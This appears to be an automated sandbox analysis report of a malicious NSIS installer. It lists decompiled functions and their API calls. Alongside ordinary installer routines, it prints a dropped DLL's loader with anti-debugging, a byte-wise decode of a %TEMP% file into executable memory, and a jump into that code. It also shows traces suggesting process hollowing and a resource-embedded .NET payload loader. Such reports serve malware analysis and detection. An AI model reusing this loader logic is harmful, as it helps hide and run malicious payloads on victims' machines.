            			// NSIS CreateShortCut instruction (EW_CREATESHORTCUT). The indirect calls through
            			// *(_t100 + 8) are IShellLinkA methods by vtable offset: +0x50 SetPath,
            			// +0x24 SetWorkingDirectory, +0x3c SetShowCmd, +0x34 SetHotkey, +0x44 SetIconLocation,
            			// +0x2c SetArguments, +0x1c SetDescription, +8 Release. The calls through
            			// *(_t100 - 8) are IPersistFile: +0x18 Save, +8 Release.
            			E004020A6(void* __eflags) {
            				void* _t44;
            				intOrPtr* _t48;
            				intOrPtr* _t50;
            				intOrPtr* _t52;
            				intOrPtr* _t54;
            				signed int _t58;
            				intOrPtr* _t59;
            				intOrPtr* _t62;
            				intOrPtr* _t64;
            				intOrPtr* _t66;
            				intOrPtr* _t69;
            				intOrPtr* _t71;
            				int _t75;
            				signed int _t81;
            				intOrPtr* _t88;
            				void* _t95;
            				void* _t96;
            				void* _t100;
            
            				 *(_t100 - 0x30) = E00402A9A(0xfffffff0); // .lnk file path
            				_t96 = E00402A9A(0xffffffdf); // shortcut target
            				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2); // arguments
            				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd); // icon file
            				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45); // description
            				if(E00405538(_t96) == 0) {
            					E00402A9A(0x21); // target does not exist: expand it again into the same buffer, so _t96 stays valid
            				}
            				_t44 = _t100 + 8;
            				__imp__CoCreateInstance(0x407324, _t75, 1, 0x407314, _t44); // CLSID_ShellLink, CLSCTX_INPROC_SERVER, IID_IShellLink
            				if(_t44 < _t75) {
            					L12:
            					 *((intOrPtr*)(_t100 - 4)) = 1; // error
            					_push(0xfffffff0);
            				} else {
            					_t48 =  *((intOrPtr*)(_t100 + 8));
            					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407334, _t100 - 8); // QueryInterface(IID_IPersistFile)
            					if(_t95 >= _t75) {
            						_t52 =  *((intOrPtr*)(_t100 + 8));
            						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96); // SetPath(target)
            						_t54 =  *((intOrPtr*)(_t100 + 8));
            						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp"); // SetWorkingDirectory($OUTDIR); the literal is that buffer's content at dump time, not a constant
            						_t81 =  *(_t100 - 0x14);
            						_t58 = _t81 >> 0x00000008 & 0x000000ff;
            						if(_t58 != 0) {
            							_t88 =  *((intOrPtr*)(_t100 + 8));
            							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58); // SetShowCmd
            							_t81 =  *(_t100 - 0x14);
            						}
            						_t59 =  *((intOrPtr*)(_t100 + 8));
            						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10); // SetHotkey
            						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
            							_t71 =  *((intOrPtr*)(_t100 + 8));
            							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff); // SetIconLocation(file, index)
            						}
            						_t62 =  *((intOrPtr*)(_t100 + 8));
            						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c))); // SetArguments
            						_t64 =  *((intOrPtr*)(_t100 + 8));
            						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44))); // SetDescription
            						if(_t95 >= _t75) {
            							 *0x409418 = _t75;
            							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409418, 0x400); // .lnk path to UTF-16 for IPersistFile
            							_t69 =  *((intOrPtr*)(_t100 - 8));
            							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409418, 1); // IPersistFile::Save(path, TRUE)
            						}
            						_t66 =  *((intOrPtr*)(_t100 - 8));
            						 *((intOrPtr*)( *_t66 + 8))(_t66); // IPersistFile::Release
            					}
            					_t50 =  *((intOrPtr*)(_t100 + 8));
            					 *((intOrPtr*)( *_t50 + 8))(_t50); // IShellLink::Release
            					if(_t95 >= _t75) {
            						_push(0xfffffff4);
            					} else {
            						goto L12;
            					}
            				}
            				E00401428();
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t100 - 4)); // exec_error counter
            				return 0;
            			}
            
            APIs
            • CoCreateInstance.OLE32(00407324,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409418,00000400,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 00402131
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: ByteCharCreateInstanceMultiWide
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 123533781-47812868
            • Opcode ID: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
            • Instruction ID: 6da020dad1963d07c1d5d6cba7c730fbb78a3e39a4a6f028781d9f3b25516250
            • Opcode Fuzzy Hash: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
            • Instruction Fuzzy Hash: 0D417D75A00215BFCB00DFA8CD88E9E7BB6FF89315B20416AF905EB2D1CA759D41CB64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			// NSIS subclass procedure for the section tree view (TreeWndProc). Message values:
            			// 0x102 WM_CHAR with 0x20 VK_SPACE, 2 WM_DESTROY, 0x200 WM_MOUSEMOVE,
            			// 0x413 = WM_USER+0x13 (NSIS WM_TREEVIEW_KEYHACK), 0x419 = WM_USER+0x19
            			// (NSIS WM_NOTIFY_SELCHANGE). 0x40929c caches the last item under the mouse.
            			E00404CA1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
            				int _t19;
            				long _t23;
            
            				if(_a8 != 0x102) {
            					__eflags = _a8 - 2;
            					if(_a8 == 2) {
            						 *0x40929c =  *0x40929c | 0xffffffff; // WM_DESTROY: reset the cached item to -1
            						__eflags =  *0x40929c;
            					}
            					__eflags = _a8 - 0x200;
            					if(_a8 != 0x200) {
            						_t23 = _a16;
            						goto L9;
            					} else {
            						_t19 = IsWindowVisible(_a4);
            						__eflags = _t19;
            						if(_t19 == 0) {
            							L12:
            							_t23 = _a16;
            							L13:
            							return CallWindowProcA( *0x79f574, _a4, _a8, _a12, _t23); // original tree-view window procedure
            						}
            						_t23 = E00404627(_a4, 1); // hit-test the item under the mouse
            						_a8 = 0x419; // handle it as WM_NOTIFY_SELCHANGE
            						L9:
            						__eflags = _a8 - 0x419;
            						if(_a8 == 0x419) {
            							__eflags =  *0x40929c - _t23; // 0xffffffff
            							if(__eflags != 0) {
            								 *0x40929c = _t23; // item changed: run the .onMouseOverSection callback
            								E004059BF(0x79f580, 0x7a4000); // save $0
            								E0040591D(0x7a4000, _t23); // $0 = item (section index) as text
            								E00401410(6); // callback index 6 = .onMouseOverSection
            								E004059BF(0x7a4000, 0x79f580); // restore $0
            							}
            						}
            						goto L13;
            					}
            				}
            				if(_a12 == 0x20) {
            					E00403DF3(0x413); // space pressed on the tree: send WM_TREEVIEW_KEYHACK to the page dialog
            					return 0;
            				}
            				goto L12;
            			}
            
            APIs
            • IsWindowVisible.USER32(?), ref: 00404CE8
            • CallWindowProcA.USER32 ref: 00404D56
              • Part of subcall function 00403DF3: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E05
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Window$CallMessageProcSendVisible
            • String ID:
            • API String ID: 3748168415-3916222277
            • Opcode ID: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
            • Instruction ID: cd4a28475afe767821094f105493c38d9b2306f15ef4c86c27c070550bfeb3f9
            • Opcode Fuzzy Hash: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
            • Instruction Fuzzy Hash: E111AF71500208FBDF219F11ED41A9B3725AF81365F00803AFA197A1E1C37D8E50CF59
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			// NSIS FileWrite / FileWriteByte instruction (EW_FPUTS). The string literal passed to
            			// WriteFile below is the content of the shared string buffer at 0x40a018 when the memory
            			// was dumped (the NSIS plugin path inside the ns*.tmp directory); it is not a constant in
            			// the code. In string mode the buffer holds the expanded parameter; in byte mode only its
            			// first byte is written (length 1, an assignment the decompiler does not show).
            			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
            				int _t5;
            				long _t7;
            				struct _OVERLAPPED* _t11;
            				intOrPtr* _t15;
            				void* _t17;
            				int _t21;
            
            				_t15 = __esi; // $var holding the file handle as text
            				_t11 = __ebx; // 0
            				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
            					_t7 = lstrlenA(E00402A9A(0x11)); // string mode: expand the parameter, length = strlen
            				} else {
            					E00402A7D(1); // byte mode: integer parameter, low byte stored into the buffer
            					 *0x40a018 = __al;
            				}
            				if( *_t15 == _t11) {
            					L8:
            					 *((intOrPtr*)(_t17 - 4)) = 1; // empty handle variable or WriteFile failure: error
            				} else {
            					_t5 = WriteFile(E00405936(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll", _t7, _t17 + 8, _t11); // handle parsed from the variable
            					_t21 = _t5;
            					if(_t21 == 0) {
            						goto L8;
            					}
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t17 - 4)); // exec_error counter
            				return 0;
            			}
            
            APIs
            • lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
            • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,00000000,?,?,00000000,00000011), ref: 00402579
            Strings
            • C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll, xrefs: 00402548, 0040256D
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: FileWritelstrlen
            • String ID: C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll
            • API String ID: 427699356-2804884011
            • Opcode ID: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
            • Instruction ID: abda26b523758e5a68d3ba22bbd8f990d4e7ca5ce812059aa2e21876e1d05e71
            • Opcode Fuzzy Hash: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
            • Instruction Fuzzy Hash: EDF0E971A04244FED710EFA49D19AAF37649B11344F10443BB102F50C2D5BC4A455B6E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			// NSIS helper trimslashtoend(): walks back from the end of the string to the last '\'
            			// and terminates the string there, leaving the directory part in the buffer; as
            			// decompiled it returns the position of the separator it overwrote. The call-site
            			// arguments show it used on the install path before the temporary-file write.
            			E00405513(char* _a4) {
            				char* _t3;
            				char* _t4;
            
            				_t4 = _a4;
            				_t3 =  &(_t4[lstrlenA(_t4)]); // start at the terminating NUL
            				while( *_t3 != 0x5c) { // 0x5c = '\'
            					_t3 = CharPrevA(_t4, _t3); // step back one (possibly multi-byte) character
            					if(_t3 > _t4) {
            						continue;
            					}
            					break; // reached the start of the buffer without finding a separator
            				}
            				 *_t3 =  *_t3 & 0x00000000; // cut the string at the separator
            				return _t3;
            			}
            
            APIs
            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405519
            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405527
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CharPrevlstrlen
            • String ID: C:\Users\user\Desktop
            • API String ID: 2709904686-224404859
            • Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
            • Instruction ID: 9a19af462094a1157adf0a1695e347c504c30875ce7c89a43b2e01bcf73e6b15
            • Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
            • Instruction Fuzzy Hash: 41D0A7B2409D706EE3031214DC04B8F7A488F17320F0904A2F040A61E5C2780C418BBD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			// Case-insensitive substring search, the NSIS helper mystrstri(): at each start
            			// position it NUL-terminates the haystack at the needle length and compares with
            			// lstrcmpiA. In this listing the overwritten byte is not restored. The call-site
            			// arguments show the caller searching for "[Rename]" (the rename-on-reboot section).
            			E00405624(CHAR* _a4, CHAR* _a8) {
            				int _t10;
            				int _t15;
            				CHAR* _t16;
            
            				_t15 = lstrlenA(_a8); // needle length
            				_t16 = _a4; // current start position in the haystack
            				while(lstrlenA(_t16) >= _t15) {
            					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000; // terminate the candidate at needle length
            					_t10 = lstrcmpiA(_t16, _a8);
            					if(_t10 == 0) {
            						return _t16; // match: pointer into the haystack
            					}
            					_t16 = CharNextA(_t16);
            				}
            				return 0;
            			}
            
            APIs
            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405644
            • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405652
            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: lstrlen$CharNextlstrcmpi
            • String ID:
            • API String ID: 190613189-0
            • Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
            • Instruction ID: 467c7d4f976b1c4b769b407f61edba7cefb266b08e25db718ea0bc1606fb1982
            • Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
            • Instruction Fuzzy Hash: 3DF0A736249D91AAC2126B359C04E6F7F94EF92325B68097AF444F2140D73A9C119BBB
            Uniqueness

            Uniqueness Score: -1.00%

            Executed Functions

            C-Code - Quality: 82%
            			// Entry routine of the dropped plugin DLL (image base 0x6EDA0000, process 9): reads the
            			// second-stage file from %TEMP%, decodes it in place in an RWX buffer and calls it.
            			E6EDA1000() {
            				long _v8;
            				short _v528;
            				long _t12;
            				void* _t16;
            				signed char _t23;
            				void* _t35;
            				long _t38;
            
            				_v8 = 0;
            				if(IsDebuggerPresent() != 0) {
            					DebugBreak(); // anti-debug: raises a breakpoint exception when a debugger is attached
            				}
            				_t12 = GetTempPathW(0x103,  &_v528);
            				if(_t12 != 0) {
            					lstrcatW( &_v528, L"\\ks446tcfy17w7jqy3r"); // encoded payload dropped next to the installer's temp files
            					_t16 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0); // executed; GENERIC_READ, full sharing, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL
            					_t35 = _t16;
            					if(_t35 == 0xffffffff) {
            						L12:
            						return _t16;
            					}
            					_t16 = GetFileSize(_t35, 0);
            					_t38 = _t16;
            					if(_t38 == 0xffffffff) {
            						L11:
            						goto L12;
            					}
            					_t16 = VirtualAlloc(0, _t38, 0x3000, 0x40); // executed; MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE
            					 *0x6eda3000 = _t16; // buffer pointer kept in a global and called below
            					if(_t16 == 0) {
            						goto L11;
            					}
            					_t16 = ReadFile(_t35, _t16, _t38,  &_v8, 0); // executed; whole file into the RWX buffer
            					if(_t16 == 0) {
            						goto L11;
            					}
            					_t23 = 0;
            					if(_v8 <= 0) {
            						L10:
            						_t16 =  *0x6eda3000(); // executed; control transfers to the decoded buffer (position-independent code)
            						goto L11;
            					}
            					do {
            						asm("rol cl, 0x2"); // rotate the decompiler could not fold into the expression below
            						 *((char*)( *0x6eda3000 + _t23)) = (0x00000082 - (( !( *((intOrPtr*)( *0x6eda3000 + _t23)) + 0x00000003 ^ 0x0000006a) ^ 0x000000e1) - _t23 ^ _t23) ^ 0x00000068) - 1 + _t23; // per-byte, index-dependent decode
            						_t23 = _t23 + 1;
            					} while (_t23 < _v8);
            					goto L10;
            				}
            				return _t12;
            			}
            
            APIs
            • IsDebuggerPresent.KERNEL32 ref: 6EDA1010
            • DebugBreak.KERNEL32 ref: 6EDA101A
            • GetTempPathW.KERNEL32(00000103,?), ref: 6EDA102C
            • lstrcatW.KERNEL32(?,\ks446tcfy17w7jqy3r), ref: 6EDA1047
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6EDA1066
            • GetFileSize.KERNEL32(00000000,00000000), ref: 6EDA107B
            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 6EDA1092
            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 6EDA10AA
            Memory Dump Source
            • Source File: 00000009.00000002.672681692.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
            • Associated: 00000009.00000002.672668724.000000006EDA0000.00000002.00020000.sdmp
            • Associated: 00000009.00000002.672759456.000000006EDA2000.00000002.00020000.sdmp
            • Associated: 00000009.00000002.672835867.000000006EDA4000.00000002.00020000.sdmp
            Similarity
            • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
            • String ID: \ks446tcfy17w7jqy3r
            • API String ID: 4020703165-2035310939
            • Opcode ID: c0ac04641a4bec83ef60dcce876c5f90c1dd83d5b5f2eaff06d607942352595f
            • Instruction ID: 06c16a8111ad777526f6d6e92f8bf485bc520e8ec9eaadef0395d3d6e3291a7d
            • Opcode Fuzzy Hash: c0ac04641a4bec83ef60dcce876c5f90c1dd83d5b5f2eaff06d607942352595f
            • Instruction Fuzzy Hash: AA212474601211ABFB205BBACC6DBAE7B68EB03754F104250E765E31C0DA34930ACA68
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02541520
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0254157F
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.670525727.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
            Similarity
            • API ID: AllocCreateFileVirtual
            • String ID: b1a2f4be1bb040dfae4382b4765a8fb2
            • API String ID: 1475775534-2543734446
            • Opcode ID: 3e9eb696310382312a471573b98bb606ff28a96822e7d8fdb3900a6b8a597b0b
            • Instruction ID: ea156400b41995e1e225b039b34c7e1e53f6eedc781307ca10d75e46920ed1fd
            • Opcode Fuzzy Hash: 3e9eb696310382312a471573b98bb606ff28a96822e7d8fdb3900a6b8a597b0b
            • Instruction Fuzzy Hash: F6E14835E44388EDEB21DBE4DC05FEDBBB5AF04714F10849AE608FA191D7B50A84DB1A
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 0254081B
            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 025409E8
            Memory Dump Source
            • Source File: 00000009.00000002.670525727.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
            Similarity
            • API ID: CreateFileFreeVirtual
            • String ID:
            • API String ID: 204039940-0
            • Opcode ID: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
            • Instruction ID: cb5ea9eaaeb3ac69c554c610fd0fedc488a083ce74010002ec2f41976b3ce809
            • Opcode Fuzzy Hash: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
            • Instruction Fuzzy Hash: 7DA1F034D00209EFEF14CFA4C985BADFBB1BF08319F208459E614BA2A0DB755A81DF18
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateProcessW.KERNELBASE(?,00000000), ref: 02540387
            • GetThreadContext.KERNELBASE(?,00010007), ref: 025403AA
            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 025403CE
            Memory Dump Source
            • Source File: 00000009.00000002.670525727.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
            Similarity
            • API ID: Process$ContextCreateMemoryReadThread
            • String ID:
            • API String ID: 2411489757-0
            • Opcode ID: 77bae4deecc96b6b8a38a97f574745c36a5dc0c9e54112462e98fa6dc6f452fc
            • Instruction ID: ce9d995eb9b95f4caf7898c769eb61ef5760a2629cae33401d3386cb3bb4ebdf
            • Opcode Fuzzy Hash: 77bae4deecc96b6b8a38a97f574745c36a5dc0c9e54112462e98fa6dc6f452fc
            • Instruction Fuzzy Hash: 9D320931E50218EEEB24CB94DC45FADBBB5BF44708F204496E609FA2E0DB705A85DF19
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Executed Functions

            C-Code - Quality: 100%
            			// Installs E00401E29 as the process-wide unhandled-exception filter
            			// (decompiler output; the filter is registered before the resource loader runs).
            			E00401E1D() {
            				_Unknown_base(*)()* _t1;
            
            				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed; returns the previous filter
            				return _t1;
            			}


            Instruction addresses (listing column): 0x00401e22, 0x00401e28

            APIs
            • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
            • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
            • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
            • Instruction Fuzzy Hash:
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			// Native loader stub: locates resource ID 1 of type 0xa (RT_RCDATA) in its own
            			// image, locks it, and hands the raw bytes to L00401000. Per the subcall
            			// listing below, L00401000 calls CLRCreateInstance (string "v4.0.30319"),
            			// i.e. the stub hosts the .NET runtime to run the embedded payload.
            			// The process exits afterwards regardless of the outcome (decompiler output;
            			// the _t13 declaration was missing from the listing and is added here).
            			E00401489() {
            				void* _v8;
            				struct HRSRC__* _t4;
            				long _t10;
            				struct HRSRC__* _t12;
            				void* _t13;
            				void* _t16;
            
            				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
            				_t12 = _t4;
            				if(_t12 == 0) {
            					L6:
            					ExitProcess(0); // no resource: terminate silently
            				}
            				_t16 = LoadResource(GetModuleHandleW(0), _t12);
            				if(_t16 != 0) {
            					_v8 = LockResource(_t16);
            					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
            					_t13 = _v8;
            					if(_v8 != 0 && _t10 != 0) {
            						L00401000(_t13, _t10); // executed; payload bytes and size
            					}
            				}
            				FreeResource(_t16);
            				goto L6;
            			}

            Instruction addresses (listing column): 0x0040149f, 0x004014a5, 0x004014a9, 0x004014ec, 0x004014ee, 0x004014ee, 0x004014b7, 0x004014bb, 0x004014c7, 0x004014cd, 0x004014d3, 0x004014d8, 0x004014e0, 0x004014e0, 0x004014d8, 0x004014e6, 0x00000000

            APIs
            • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
            • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
            • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
            • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
            • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
              • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
            • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
            • ExitProcess.KERNEL32 ref: 004014EE
            Strings
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
            • String ID: v4.0.30319
            • API String ID: 2372384083-3152434051
